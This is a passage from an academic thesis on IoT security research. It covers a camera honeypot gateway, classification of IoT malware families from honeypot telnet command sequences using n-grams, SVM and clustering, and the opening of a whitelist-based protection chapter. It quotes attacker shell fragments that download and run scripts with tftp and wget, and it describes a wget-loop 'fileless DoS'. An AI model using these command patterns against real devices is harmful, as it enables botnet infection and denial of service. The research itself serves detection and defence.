IP Camera A1 /monitor2.htm 50 50
IP Camera B /main.htm 40/50 40/50
IP Camera C /video.cgi* 50 50
IP Camera D /top.htm 50 50
*The certificates in the default firmware of IP Camera C is out-of-date. Hence, browsers including IE,
Firefox, Chrome, and Safari block the rendering function of live stream of default web pages. Hence, we
employed the hidden live stream application (/video.cgi) which employed by the attacker in 4.2 to
evaluation.
4.5. Discussion
From the observation of cyber attacks in dataset 2, our honeypot successfully collected attacks
against physical IoT devices Through ThingGate. These attacks, such as peeping video streams,
control the direction of the camera, and RCE attacks first and then download live stream via
hidden web application are hard to simulate by the virtual machine. From the block unwanted
experiment, we show that ThinkGate can block attack which change critical configuration. In
addition, we also found 44 clients request the Wi-Fi AP information web page from the fabricated
sensor information experiment. From the 44 clients, 41 clients employed a predefined list to scan
victims, two are human-like attackers, and Googlebot. From the web tracking experiment, we
successful extended a tracking function to IoT devices and tracked an attacker employed three
USA IP addresses to visit our honeypot. About the misplaced attacks, ThingGate extracts 411 CI-
URL and download 149 different malware binaries and 23 scripts. Moreover, we found there are
18 binaries utilized the ThinkPHP vulnerability which is not an IoT device but a web application
46
framework. The abuse of HTTP 80 port becomes more serious. From the stress testing results,
attackers can get the same rendering live stream from IP cameras through ThingGate. Hence, we
can build the bare-metal IoT honeypots together with ThingGate.
4.5.1. Limitations
ThingGate does have some limitation. Many of the limitations come from the design of CI-
URL analyzer. First, the URL parser only analyzes the CI-URL which attacker embedded OS
commands in URL. Our program did not check other header field or form data yet. Second, the
script parser only was able to handle several kinds of shell scripts. A Linux sandbox can resolve
more types of scripts. However, the sandbox must be monitored and implemented with the high-
security design because of the Brickerbot. Thirdly, our web tracking function relies on JavaScript
and Canvas fingerprint. Therefore, if the clients cannot render the JavaScript code, the client
cannot trigger fingerprint function.
47
Chapter 5.
IoT Malware Analysis and New Pattern Discovery Through
Sequence Analysis Using Meta-Feature Information
5.1. Introduction
Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and
buildings, that are embedded with electronics, sensors, and networking abilities. Connectivity
enables these objects to collect and exchange data for further application. However, in October
2016, the IoT malware called Mirai executed the massive distributed denial of service (DDoS)
attack against Dyn DNS, enlisting approximately 100,000 Mirai IoT Botnet nodes for a reported
attack rate of up to 1.2 Tbps [2]. According to the report from Kaspersky in Sept. 2018, Mirai is
still the most popular IoT malware family for cybercriminals (20.9%). Moreover, the most popular
attack and infection vector against devices remains the telnet service (75.4%) [8]. Although
signature-based detection methods are sensitive to the structures of existing malware samples,
even a small change in a malware program could alter its signature sufficiently to thwart antivirus
detection. Therefore, an urgent necessity is to analyze IoT malware and related logs to recognize
the behavior of unfamiliar threats and thus assist organizations in mounting a timely and
appropriate defense.
Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is projected
to grow to 20.8 billion by 2020 [1]. Embedding information and communication technology into
devices thus represents an ongoing trend. The nature of IoT presents challenges in establishing a
comprehensive security mechanism. These challenges arising from IoT devices are as follows:
1. Most IoT devices are always online.
2. Most utilize simple, low-level hardware.
3. IoT devices have a variety of CPU architectures and OS.
48
4. Antivirus and monitoring services are lacking.
5. Diverse developers result in a lack of unified standards.
6. IoT malware attack patterns are continually evolving, with an extremely large damage scope.
Few of them are protected by antivirus software. To analyze the threat of IoT malware, Pa et
al. [4] proposed IoTPOT, a honeypot that observes cyber attacks against IoT devices, focusing on
telnet-based attacks; it emulated IoT devices that accepting telnet protocol connections. When
attackers access IoTPOT, it records the entire netflow and maintains logs for further analysis, such
as downloading samples. Since 2015, 6,016,030 download attempts from 1,085,664 different
hosts have been successfully observed and over 40,000 malware samples downloaded. Moreover,
124,517,838 telnet session logs have been collected, recording all the shell command input sent
by the attackers. IoTPOT thus represents a useful method of collecting samples, analyzing threat
behavior, and understanding cyber attacks in IoT. However, the enormous data size resulted in
huge time and resource cost when analyzing their patterns and relationship. It is an urgent
necessity to create an appropriate view which analyzes the incoming data in depth and utilize our
resource efficiently.
The purpose of this study is to apply machine learning techniques to create a simplified and
accurate view of cyber attacks in IoT. The method determines categories of malware by analyzing
its meta-features and command sequences. Its contributions may be summarized as follows:
1. We proved that similar IoT malware binaries conduct similar infection commands. Moreover,
through similarity analysis of command sequences, we can identify the malware category of
unknown threats.
2. By clustering telnet logs, we discovered a new DoS cyber attack executed using pure Linux
commands, without IoT malware binaries.
3. Using malware samples from the IoT honeypot, our proposed method could identify malware
categories with 96.70% accuracy.
49
5.2. Methods
5.2.1 Preliminaries
All the data in this research were observed in IoTPOT [4]. We used VirusTotal malware labels
as the ground truth of data. Command sequences were extracted from IoTPOT telnet session logs
and concatenated into a sequence according to the input order. A command sequence could
contain single or multiple shell command clauses. In this study, we mainly analyzed infection
sequences according to target, purpose, and frequency, and found that most of them consisted of
five types of atomic behavior:
1. Authentication behavior
Login with ID and password
2. Resource scan behavior
Resource scan is a command that finds available functions and writable folders in an IoT
device; for example, “/bin/busybox Mirai” tests “/bin/busybox,” and “/bin/busybox cat
/proc/mounts” aims to find a writable folder.
3. Change directory behavior
Changes the directory/folder of the terminal’s shell.
4. Create or download files behavior
Uses “echo” to produce binary files or “wget,” “tftp” to download files.
5. Execution behavior
Uses “sh” to execute downloaded binary or script files.
Malware sometimes executes “chmod” to alter file privileges, “history –c –r” to purge the
system log, “rm” to remove files, and “exit” to terminate the session. These commands may be
executed multiple times to ensure that the infection is successful. Only a few “kill” and “killall”
commands were found in our data, they mostly tighter with the “while true;” loop and ”wget”
commands.
We collected 69 million command sequences containing the Mirai signature, all of the
sequences were recognition type, which only contains login credentials and several Linux
commands such as "enable, system, shell, sh, and /bin/busybox echo." These commands were not
50
related to malware binaries, and the information of each sequence was too few for analysis.
IoTPOT did not capture any Mirai infection command sequences because dozens of verification
steps are performed by the attacker’s server, each of which must receive a corresponding response,
such as the “echo,” “cat /etc/mounts,” and “cp /bin/echo” commands. We determined these steps
based on the Mirai source code [65][66]. To observe Mirai’s infection command sequence, we
developed new honeypots consisting of physical IoT devices that could respond correctly to Mirai.
We thereby captured 578,671 Mirai command sequences from December 11, 2016, to February
28, 2017, approximately 32% of which were infection command sequences executed by Mirai
and 68% of which were simple recognition command sequences. We, therefore, had to narrow the
scope of the command sequences, focusing on those that related to downloaded malware binaries
or cause the serious cyber security threat. Table 11 shows the results of other research [4] with a
comparison of labels.
Table 11 Comparison of labels and infection command sequence [4].
Label Pattern of Command Sequence Number of
attack/Day
(Average)
Bashlite Using a downloaded shell script, kill previously
running malicious process, download malware binaries
of different CPU architectures, and block 23/TCP to
prevent other infections.
Run all downloaded malware binaries.
290
Nttpd Change directory to /tmp.
Check whether shell can be used by echoing
“welcome.”
Run binaries.
48
ZORRO Check whether “wget” command is usable. 2232
51
Check whether busybox shell can be used by echoing
“ZORRO.”
Remove various commands and files under /usr/bin/,
/bin, /var/run/, and /dev.
Copy /bin/sh to random filename.
Append series of binaries to random filename and
make attacker’s own shell.
Using attacker’s own shell, download binary. The IP
address and port number of the malware download
server can be seen in the command.
Run binaries.
In this study, VirusTotal was used to obtain scan results from 66 antivirus engines. We sent
12,821 unique malware MD5s from IoTPOT and received 3,306 reports. We then chose the most
frequent malware family name as the representative malware category. Table 12 shows the top
five antivirus engines for IoT malware.
Table 12 Top 5 antivirus engines for IoT malware.
AV/Consistency % Mirai
(207)
Bashlite
(2733)
Hajime
(5)
Tsunami
(48)
Kaspersky 98.06 100 100 89.58
DrWeb 96.61 97.36 100 60.41
ESET-NOD32 98.55 93.66 100 91.66
Sophos 85.50 89.82 80 95.83
Avast 85.02 88.58 20 35.41
We chose Kaspersky, DrWeb, and ESET-NOD32 to locally scan 40,203 different IoT malware
binaries and found that DrWeb could label 39,245 of them, representing 97.61% of the submitted
52
malware and thus surpassing Kaspersky (69.82%) and ESET-NOD32 (74.57%). Therefore, we
employed DrWeb to label the IoT malware as the basis for malware categories.
5.2.2. Encoding and measurement of command sequences
Data encoding. To process numerous complex sequences we used a simplified representative
form called extracted command tokens (ECTs). For example, sequences of the command [‘cd
/tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; tftp -r tftp.sh -g test.test.org; sh tftp.sh;
busybox wget http’] can be expressed as the encoded sequence “ccccctsw,” which represents each
command by a single letter, such as “w” for “wget” and “c” for “cd.” Then applying a natural
language processing algorithm to classify the ECTs, having made a table mapping each of the 51
commands to a corresponding letter. An example of a command mapping table is shown in Table
13. These commands were derived from historical observation data in the IoTPOT.
Table 13 An example of the command mapping table.
Command token Command token
/bin/busybox B exit q
cd C chmod c
enable e echo E
sh h wget w
Comparison of distance measures. The following six distances [67] are applied to measure
the similarity between different categories. The distances are one minus similarities.
1. Cosine: Cosine similarity is a measure of similarity between two non-zero vectors of an inner
product space that measures the cosine of the angle between them. The strings are first
transformed in vectors of occurrences of k-shingles (sequences of k characters) [68]. In the
n-dimensional space, the similarity between the two strings is the cosine of their respective
vectors. The definition of cosine similarity between two strings s1 and s2 as follows:
cos(𝑣(, 𝑣*) =𝑣( ∙ 𝑣*|𝑣(| ∙ |𝑣*|
53
Where v1 and v2 are transformed in vectors of occurrences of k-shingles against strings s1 and
s2.In our system, we set k = 3.
2. Trigram: Apply trigram distance to determine how similar two strings are. The measures of
similarity between two strings are defined as the ratio of the number of trigrams that are
shared by two strings and the total number of trigrams in both strings by the formula [69]:
2×|𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑋 ∩ 𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑌 |𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑋 + |𝑡𝑟𝑖𝑔𝑟𝑎𝑚𝑠 𝑌 |
, where n-grams(X) is a multi-set of letter n-grams in X.
3. Normalized longest common subsequence (NLCS): The longest common subsequence can
be considered the sequential analog of the cosine distance between two ordered sets. Thus,
given two sequences X and Y, of lengths m and n respectively, we calculate the NLCS by the
formula [70]:
𝑁𝐿𝐶𝑆 =𝑙𝑒𝑛𝑔𝑡ℎ(𝐿𝐶𝑆)
𝑚 + 𝑛+ 𝜀,
where ε is a constant whose value is 0.5 if the first character of the strings x1 ∈ X and y1
∈ Y are matching otherwise it is 0.
4. Metric longest common subsequence (MLCS): Measure the degree of similarity between the
two series. The metric is defined as follows [71]:
𝑀𝐿𝐶𝑆 =𝑙𝑒𝑛𝑔𝑡ℎ(𝐿𝐶𝑆)
𝑚 + 𝑛
5. Normalized Levenshtein Distance (NLD): The sum of the length normalized Levenshtein
distance between the words occupying the same meaning slot divided by the number of word
pairs. The Levenshtein distance between two strings x, y (of length |x|, |y| respectively) is
given by levx,y (|x|, |y|) as follows:
𝐿𝑒𝑣F,G(𝑖, 𝑗) =
max 𝑖, 𝑗 𝑖𝑓 min 𝑖, 𝑗 = 0
𝑚𝑖𝑛𝑙𝑒𝑣F,G(𝑖 − 1, 𝑗) + 1𝑙𝑒𝑣F,G(𝑖, 𝑗 − 1) + 1
𝑙𝑒𝑣F,G(𝑖 − 1, 𝑗 − 1) + 1(FRSGT)otherwise
Where 1(FRSGT) is the indicator function equal to 0 when xi = yj and equal to 1 otherwise.
Normalized Levenshtein is defined by the formula [72]:
Normalized𝐿𝑒𝑣F,G =𝐿𝑒𝑣F,G
max( x , |y|)
6. Jaro-Winkler: A string metric measuring an edit distance between two sequences with
54
favorable ratings to strings that match from the beginning for a set prefix length. The Jaro-
Winkler distance is a variation of Jaro distance. The Jaro distance dj of strings s1 and s2 is
defined as:
𝑑` 𝑠(, 𝑠* =𝑚3 ∙ 𝑙(
+𝑚3 ∙ 𝑙*
+𝑚 − 𝑡3 ∙ 𝑚
Where l1 and l2 are the lengths (in characters) of s1 and s2, m is the number of matching
characters, and t s half the number of transpositions. The Jaro-Winkler distance dw
emphasizes prefix similarity between two strings. It is defined as [73]:
𝑑b 𝑠(, 𝑠* = 𝑑` 𝑠(, 𝑠* + 𝑙 ∙ 𝑝 ∙ 1 − 𝑑` 𝑠(, 𝑠* ,
Where l is the length of the longest common prefix of s1 and s2, and p is a constant scaling
factor that also controls the emphasis placed on prefix similarity. The implementation we
used considers prefixes up to 6 characters long, and sets p = 0.1.
We choose the top 500 command sequences in the four categories and then calculated the
average and minimum distances between categories, with the results shown in Table 14 and Table
15. Specifically, we apply six distance measurement methods and calculate the adjacency matrix
between pairs of malware categories, and then calculate the average and minimum distance. The
columns under the “B-N” header indicate the distance between Bashlite and nttpd using the six
measurements, the columns under “M-Z” the distance between Mirai and ZORRO, and so on. We
determined that cosine was the best distance for distinguishing ECTs, with trigram just slightly
lower. However, we found a few command sequences in the same session containing both Bashlite
and nttpd. The command sequence from the Bashlite source code of has been leaked, so that other
attackers can copy its function and use it in their malware [15]. Therefore, the malware executes
the command sequence using multiple categories’ signatures. Because cosine distance cannot
distinguish the combined type of Bashlite command sequence, trigram provides a better solution
for combined or mixed command sequences. Moreover, the source code for Mirai has similarly
been leaked [74]. Based on the distance measure results, we chose trigram for use in this study.
55
Table 14 Distance measures for different malware labels (average).
Distance/categ
ory B-N B-M B-Z N-M N-Z M-Z
Cosine 0.9686 0.9492 0.9958 0.9990 1.0000 0.9516
Trigram 0.9086 0.9436 0.9230 0.9516 0.9661 0.9351
NLCS 0.7864 0.8888 0.8621 0.8895 0.9266 0.8642
MLCS 0.8367 0.9307 0.8971 0.9299 0.9472 0.9132
NLD 0.8795 0.9358 0.9118 0.9336 0.9585 0.9197
Jaro-Winkler 0.5238 0.6001 0.5615 0.5457 0.5851 0.4710
Table 15 Distance measures for different malware labels (minimum).
Distance/categ
ory B-N B-M B-Z N-M N-Z M-Z
Cosine 0.0163 0.7259 0.2929 0.5736 0.9678 0.1783
Trigram 0.4048 0.6968 0.1111 0.6667 0.6481 0.6197
NLCS 0.2500 0.5748 0.1429 0.4118 0.5556 0.3734
MLCS 0.3529 0.5893 0.1667 0.5455 0.6000 0.4048
NLD 0.3929 0.6857 0.1667 0.5455 0.6667 0.5318
Jaro-Winkler 0.2167 0.3217 0.0978 0.3119 0.2933 0.2251
Malware category Feature extraction. N-gram is an algorithm based on computational
linguistics and probability [75], which can be used to estimate the likelihood of a sentence
occurring at all or following a given word. N-gram can also provide efficient approximate string
matching. Using N-gram to index lexicon terms, a signature file can be compressed to a smaller
size. Moreover, N-gram can be used to calculate the similarity between two strings [76].
In this method, we used N-gram to collect ECT occurrence patterns. For each malware category,
we collected the top 10 N-gram features, representing the major behavior in each category, and
56
presented them as a histogram. These features were all based on a trigram model, namely, n = 3.
We calculated the trigram histogram using four months data for two categories. The command
sequence distribution of Bashlite, Mirai, and Satori are shown in Fig. 15, 16, and 17, respectively.
Based on the common command patterns of each malware category, we found that Bashlite tended
to contain “cd,” “sh,” and “rm” behavior, Mirai often contained terms such as “busybox,” “cat,”
and “echo,” and Satori tended to use terms such as “&&,” “cp,” and “busybox.” The results
indicated that trigram could assist in revealing distinctive attack patterns among different IoT
malware categories.
Fig. 15 Trigram statistics of Bashlite IoT malware.
57
Fig. 16 Trigram statistics of Mirai IoT malware.
Fig. 17 Trigram statistics of Satori IoT malware.
To find the best n of n-gram similarity for analyzing our compressed data. We calculated the
Bigram, Trigram, and 4-gram distance between Bashlite and Mirai ECTs. Besides, we conducted
the calculation on both general and worst cases. We choose another longest 500 ECTs from Mirai
and Bashlite as worst case data. Table 16 and Table 17 show the distance and time cost of different
n-gram. For the top 500 ECTs case, Trigram takes only 21 seconds and gets a distance similar to
4-gram. Moreover, Bigram costs 20 seconds and gets a shorter distance than Trigram. In the case
of the longest 500 ECTs, Bigram spends the least time and gets about 0.01 shorter distance than
58
Trigram and 4-gram. Trigram spends 73 more seconds cost than Bigram. Therefore, for worst
case, Bigram is good enough, and Trigram is suitable for the top 500 ECTs. In this method, we
choose Trigram as our measurement for ECTS.
Table 16 Distance measures for different n-gram between Bashlite and Mirai
Bashlite - Mirai Bigram Trigram 4-gram
Top 500 ECTs 0.937090 0.943678 0.944708
Longest ECTS 0.930650 0.940600 0.945393
Table 17 Time cost for different n-gram between Bashlite and Mirai
Bashlite - Mirai Bigram Trigram 4-gram
Top 500 ECTs 20 sec 21 sec 24 sec
Longest ECTS 466 sec 539 sec 569 sec
5.2.3. Data analysis
The complete analytical process is illustrated in Fig. 18. First, command sequences were
extracted from pcap files, filtering for infection command sequences. Next, the command
sequence was encoded to create ECTs, and then the N-gram model was used to extract trigram
features from them. Finally, classification and clustering analysis was performed to determine
malware categories and new patterns.
59
Fig. 18 Data analysis flow
Clustering algorithms. The cyber attacks in IoT are keep evolving and the pattern of attacks
is uncertain. Therefore, we choose the hierarchical clustering method because it does not require
to predefine the number of clusters. To identify new patterns, we chose a single-linkage
hierarchical clustering algorithm sensitive to outliers. The hierarchical clustering method works
by successively combining individual data into cluster [77]. To our knowledge, the use of
clustering algorithms in malware-related datasets was introduced Bailey et al. [78], who also
employed hierarchical clustering.
Classification algorithms. We have transformed the telnet logs into a smaller ECTs' dataset.
However, trigram still generated hundreds of features. According to our statistics of trigrams,
some Linux commands occurrence tightly in order, such as malware would like to utilize "cd" to
move to a writable folder and then conduct the download tasks via "wget" or "tftp" commands.
In text categorization research, Joachims [79] has shown SVM could handle high dimensional
input space and few irrelevant features. Instead, The Naive Bayes classifier assumes that the
distribution of different terms is independent of each other. Even though the independence
assumption is false in many real-world applications, Naive Bayes performs surprisingly well [80].
Therefore, we chose SVM as our classification algorithm and Naive Bayes classifier as the
60
baseline. After conducting the same experiments with these two algorithms, we can determine
which was better for our research.
l Naive Bayes
Naive Bayes classifiers assume that an attribute value’s effect on a given class is independent of
the values of other attributes; this is called “class-conditional independence” [81]. The Naive
Bayes classifier greatly simplifies learning by assuming that features are independent given class.
Although independence is generally a poor assumption, in practice Naive Bayes often competes
well with more sophisticated classifiers [82]
l Support Vector Machines
SVM is a useful technique of data classification, whose aim is to produce a model that predicts
the target values of the test data based solely on their attributes [79]. Given a training set of
instance–label pairs (xi, yi), i = 1,…, l , where xi ∈ Rn and yi ∈ {1, −1}, SVM requires solution
of the following optimization problem:
Subject to yi (wT φ (xi) + b) ≥ 1- ξi, ξi ≥ 0, i=1, …, l
Where K (xi, xj) ≡ φ(xi)Tφ(xj) is called the kernel function. Many kinds of kernel function options
are available, such as linear, polynomial, and sigmoid. For our dataset, we chose a linear kernel
function according to our ECT numbers [78][79].
Classification evaluation. We used a confusion matrix and accuracy to measure the
classification result. Given a target category, let TP (true positive) be the number of ECTs
correctly classified as the target category; FN (false negative) the number of sequences from the
target category misclassified as another. Moreover, TN (true negative) the number of sequences
from other categories that are correctly classified; and FP (false positive) the number of sequences
61
incorrectly classified as the target category. The precision (P) is defined as precision = TP/ (TP +
FP), and the recall rate (R) is defined as recall = TP/ (TP + FN). The F-score represents the
harmonic mean of (P) and (R) and provides a balance between them: F-score = 2 PR/ (P + R).
The F-score assists in identifying a threshold of similarity. Accuracy (A) is defined as accuracy =
(TP+TN) / (TP + FP + FN + TN), and the error rate is defined as error rate = (FP+FN) / (TP + FP
+ FN + TN) [77].
5.3. Experiments
5.3.1. Dataset and Environment
Data collection for classification was undertaken from December 2016 to September 2017. The
dataset contained data for 284 days from physical IoT devices in the IoTPOT. As illustrated in
Table 18, the dataset included 2.7 million infection command sequences related to malware that
we downloaded to another server in real time. These sequences could be reduced to 44,843 unique
command sequences through correlation and deduplication. Moreover, our encoding method was
able to reduce the command sequences to 2,925 ECTs. To discover hidden patterns, we chose the
data for a one-month period as dataset 2 for the clustering experiment.
Table 18 Dataset for analysis.
Dataset Number of
infection
command
sequence
Rearranged
command
sequence
Number
of
unique ECTs
Time interval Analysis
1 2,756,231 44,843* 2,925 2016/12/07~
2017/09/16 NB, SVM
2 422,591 95,448** 4,626 2017/04/01~
2017/04/30
Hierarchical
clustering
* Correlating malware binaries, extracting command sequences that download binaries, and conducting
62
data deduplication
** Extracting command sequences and conducting data deduplication
DrWeb was used to scan the malware binaries, after which malware labels and corresponding
ECTs could be obtained. The distribution of labels is shown in Table 19, indicating that the
majority of malware in the IoTPOT came from Bashlite and Mirai.
Table 19 Malware categories and ECTs' distribution.
Label Bashlite Mirai Hajime Tsunami Numbers of ECTs
665 3408 155 58
Numbers of malware
2755 2665 34 162
From Dec. 7th, 2016 to Sept. 16th, 2017, our honeypot has collected 1.36 terabyte (TB) pcap
files. We extract 22.9 gigabytes (GB) telnet logs via a server with ten cores Intel 2.20 GHz CPU,
62 GB RAM, and 4 Terabytes disk. This task is scheduled automatically run every day. Processing
1.36TB pcap files will cost about eight days. The other time cost of our method is shown in Table
20. The data preprocessing begins at filter infection command from telnet logs. For filter out and
label the malware related telnet logs in dataset 1, we utilize Google BigQuery [83] to process 22.9
GB telnet logs. ECTs transformation and machine learning algorithms were conducted via a
machine with two quad-core Intel 3.70 GHz CPU, 16 GB RAM, and 1 TB disk. The SciPy 0.18.1
[84] is used for supporting clustering and classification algorithms.
Table 20 Statistics of time cost.
Algorithm Set Data preprocessing
Feature extraction
Clustering/ Classification
Total
SVM 1 174 mins 1
secs 21 secs 20 secs
174 mins 42secs
Naïve Bayes 1 174 mins 1
secs 21 secs 15 secs
174 mins 37 secs
63
Hierarchical Clustering
2 13 secs
73 mins 21 secs
1 mins 5 secs
74 mins 39 secs
5.3.2. Clustering Experiments
The hierarchical clustering method involves successively combining individual data into
clusters. We conducted a hierarchical clustering analysis using dataset 2. As shown in Fig. 19, the
algorithm separated 4,636 ECTs into 30 clusters according to the trigram distance. We labeled the
clusters according to antivirus engine scan results of malware binaries or with reference to
malware analysis reports from cybersecurity researchers. Detail text features of malware families
are summarized in Appendix A.
Our method successfully differentiated three known malware families and their variants and
also discovered one new cyber attack pattern in IoT, called “Fileless DoS.” Although the four
best-known malware families are Mirai, Bashlite, Hajime, and Tsunami, Tsunami employs Linux
commands in a similar manner to Bashlite and be assigned to the leaf cluster named "(10)”. The
MD5 of Tsunami which shares similar infection pattern of Bashlite, shown in Appendix B.
64
X-axis: ECT index number # or cluster size (*)
The clustering results helped to discover the following malware variants and new cyber attack
pattern:
l Mirai/A and Bashlite/A are malware variants that truncate ptmx files after login. The ptmx
file is used to create a pseudoterminal master–slave pair [85]. Both Mirai/A and Bashlite/A
contain this command, and the maximum distance to separate them must be less than 0.58.
l Mirai/B targets devices with weak default credentials which login ID is root or Admin and
password is 5up, such as TP-Link (TL-WR740N) [86]. The Mirai/B commands are more
straightforward than those of the original Mirai. For example, Mirai/B does not check device
partitions such as cat /proc/mounts [66].
l Fileless DoS is a shell script that employs an infinite while loop and multiple wget
commands to mount a DoS attack. Downloaded web contents are sent to /dev/null, and thus
no binaries are stored in devices. A total of 934 Fileless DoS ECTs were discovered in April
2017. The top ten victim websites are shown in Table 21, including those of a music band,
a construction company, and an IT solutions company.
Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017
65
Table 21 Victims of Fileless DoS.
Victim websites Counts
http://fxxxxxxxx.com:80 7111
http://xxx.xxx.80.118:80 5669
http://www.txxxxxxxxxxxx.com:80 2722
http://www.hxxxxxxxx.co.il:80 2564
http://www.bxxxxxxxxxxxxxxxxxxxxx.com:80 2354
http://www.kxxxxxxxxxxxxxxxxxxxxxxxxx.de:80 1982
http://txxxxxxxxxxx.com:80 1980
http://www.axxxxx.dk:80 1878
http://xxx.xxx.19.69:80 1843
http://cxxxxxxxxxxxxxxxxxx.com:80 1749
5.3.3. Classification Experiments
Because the data amounts varied greatly among categories, we designed two experiments to
identify whether data bias affected classification accuracy. Two datasets were prepared for our
experiments. The first contained 1000 ECT types per malware category; Bashlite, Hajime, and
Tsunami data were repeated up to 1000. The second dataset contained all ECT types from every
category. Our program randomly chose 50% of the data as a training set and then tested the
remaining 50%. To avoid selecting only Mirai data, however, we randomly chose the training
dataset for the second experiment. The precision and recall scores are listed as Table 22, Table 23,
Table 24, and Table 25.
Table 22 Classification performance of even sampling- Naive Bayes.
label precision recall f1-score support
Bashlite 0.87 0.89 0.88 513
Mirai 0.83 0.77 0.80 499
Hajime 1.00 1.0 1.00 476
66
Tsunami 0.70 0.74 0.72 512
avg / total 0.85 0.85 0.85 2000
Table 23 Classification performance of even sampling- SVM.
label precision recall f1-score support
Bashlite 1.0 0.87 0.93 513
Mirai 0.85 0.75 0.80 499
Hajime 1.0 1.0 1.0 476
Tsunami 0.70 0.87 0.78 512
avg / total 0.89 0.87 0.87 2000
Table 24 Classification performance of random sampling- Naive Bayes.
label precision recall f1-score support
Bashlite 0.88 0.93 0.91 155
Mirai 0.98 0.99 0.99 1225
Hajime 0.94 1.0 0.97 60
Tsunami 0.00 0.00 0.00 24
avg / total 0.95 0.97 0.96 1464
Table 25 Classification performance of random sampling- SVM.
label precision recall f1-score support
Bashlite 0.92 0.94 0.95 155
Mirai 0.98 1.0 0.99 1225
Hajime 1.0 1.0 1.0 60
Tsunami 0.00 0.00 0.00 24
avg / total 0.96 0.98 0.97 1464
Based on the results of these experiments, SVM performed better than Naive Bayes. However,
Tsunami was easily misclassified as Bashlite. We believe that second-stage training is necessary
for real cases. Such reinforcement learning also called active learning involves fine-tuning the
67
model during the training process. Therefore, based on the prediction results for Bashlite and
Tsunami, we further developed a sub-training approach by adding an additional feature (file size)
and performing sub-classifier training. As shown in Table 26, the precision of Tsunami
classification improved because its file sample metadata differed from that of Bashlite. Using
additional features can thus help to prevent misidentifying classes that share the same command
line pattern, without requiring static and dynamic analyses and simply by looking at the command
line and file meta-information. Mirai’s open source code provides hackers with an entry point for
developing new variants. It has been noted that hackers rely on using known or zero-day
vulnerabilities for developing new Mirai variants to attack IoT devices [87]. Hence, these
evaluations may incur new patterns of ECTs.
Table 26 Precision/recall of SVM – second stage (reinforcement learning).
label precision recall f1-score support
Bashlite 0.99 0.99 0.99 155
Mirai 0.98 1.00 0.99 1225
Hajime 1.0 1.0 1.00 60
Tsunami 0.90 0.86 0.88 24
Avg / total 0.96 0.98 0.97 1464
5.4. Discussion
For IoT malware which attacks via the telnet protocol, our clustering experiments show our
method can find new cyber attack, "Fileless DoS" and changes from malware variants. Moreover,
our trigram features could help classification of IoT malware. Comparisons with previous studies
are as follows:
l The method proposed by Ham et al. [25] rely on features about the network, phone, message,
CPU, battery, and memory for each process in Android devices. However, IoT devices are
68
hard to extend and install third-party packages. Our method only analyzes the telnet traffic
between attacker and victim devices. There is not any modification for IoT devices.
l Azmoodeh, Dehghantanha, and Choo [26] analyzed the OpCode sequence and applied a deep
Eigenspace learning approach to classify malicious and benign application. Their method is
excellent that could achieve 99.68% accuracy. The OpCode sequence generated by malware
binaries, but IoT malware, such as Mirai and Bashlite may remove their binaries after
execution. Moreover, many IoT devices utilized flash storage, rebooting will erase the
malware binaries. However, our method does not need to convert binaries to OpCode and
graph, can infer the malware family by telnet traffic and demonstrates 96.70% accuracy.
l Su et al. [27] investigated a lightweight method of detecting DDoS malware in IoT
environments. They converted binaries to grayscale images and then classified IoT malware
families by a convolutional neural network. The system could achieve 94.0% accuracy in
goodware and DDoS malware classification and 81.8% accuracy in classification of
goodware and the two main malware families. Su's method only examines Mirai and Bashlite
family. Our method examines four malware families and achieves 96.70% accuracy.
In this method, we utilize physical IoT devices as honeypot to obtain the dataset. These devices
are known to have been targeted by IoT malware and in that sense we believe that the dataset can
provide partial view of real cyber attacks against IoT devices in the wild. We cannot claim that
the dataset represents the whole attacks in IoT as we have only limited number of devices for
honeypot. However, we believe the study is meaningful as the honeypot was indeed able to
observe and capture samples from four major IoT malware families targeting IoT telnet services
and the proposed method was able to discover evolving attack like fileless DoS.
The limitations of our method may come from the attack vector of IoT malware:
(1) Our method does not analyze HTTP or SSH protocol.
69
(2) Our method might be affected if hackers intentionally add parts of other malware codes to
their malware.
70
Chapter 6.
IoTProtect: Highly Deployable Whitelist-based Protection for
Low-cost Internet-of-Things Devices
6.1. Introduction
The Internet of Things (IoT) is a network of physical devices, such as vehicles, furniture, and
buildings, embedded with electronics, sensors, and network connectivity. Connectivity enables
these objects to collect and exchange data for further applications and business use. However, a
threat from IoT malware has materialized. In Oct. 2016, an IoT Malware called Mirai, reported
to have infected over 100,000 compromised IoT devices such as Internet Protocol (IP) cameras,
conducted the largest ever distributed denial of service (DDOS) attack against Dyn DNS [2]. We
have been using IoTPOT [4], a honeypot that monitors attacks on IoT devices, to observe cyber
attacks against such devices and analyze the threats from IoT malware. As shown in Fig. 20, the
number of attacking hosts, many of which are indeed IoT devices compromised and misused by
attackers, has increased rapidly since Aug. 2016.
Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March 2017
71
Our observations show that most of the compromised devices are home routers [88] and IP
cameras [89]. Although many security vendors have developed commercial anti-virus software
for embedded systems, such as those listed in Table 27, these are not suitable for protecting the
above-mentioned low-cost devices as a result of resource constraints and unsupported platforms.
Moreover, all of the commercial products require substantial modification of the firmware that
would incur high engineering costs, especially if the manufacturer wants to deploy the security
product on existing products.
Table 27 Commercial secure software against embedded systems.
Product name Supported platform Min. Resource
Constraint
Other Constraint
McAfee
Embedded Control
6.x [90]
RHEL 4/5/6/7
CentOS 5/6/7
SuSE 10/11
Open SuSE 10/11
Solaris 9/10
WEPOS, POSReady 2009
Windows Embedded
Systems (WES) 2009
Windows XP/vista/7/8
Windows
NT/2000/2003/2008
512 MB RAM
80 MB free disk
space
Rebuild kernel module
[94]
Kaspersky
Embedded
Systems Security
2.0 [91]
Windows xp/7/8/10
WEPOS 2009/7
WES xp/7/8
Windows 10 Redstone
Windows 10 IoT Ent
256 MB RAM
50 MB free disk
space
N/A
Trend Micro
OfficeScan 10.6
WEPOS 2009/7
WES XP/vista/7
256MB RAM
350 MB free disk
N/A
72
[92] space
Symantec Critical
System Protection
5.2 (Agent) [93]
RHEL 5/6
CentOS 5/6
SUSE 8/9/10/11
Solaris 10/11
Oracle 5/6
QNX
IBM AIX 5L
HP Unix 11
WEPOS, 2009/7
WES xp/7
Windows XP/vista/7/8
Windows 2003/2008/2012
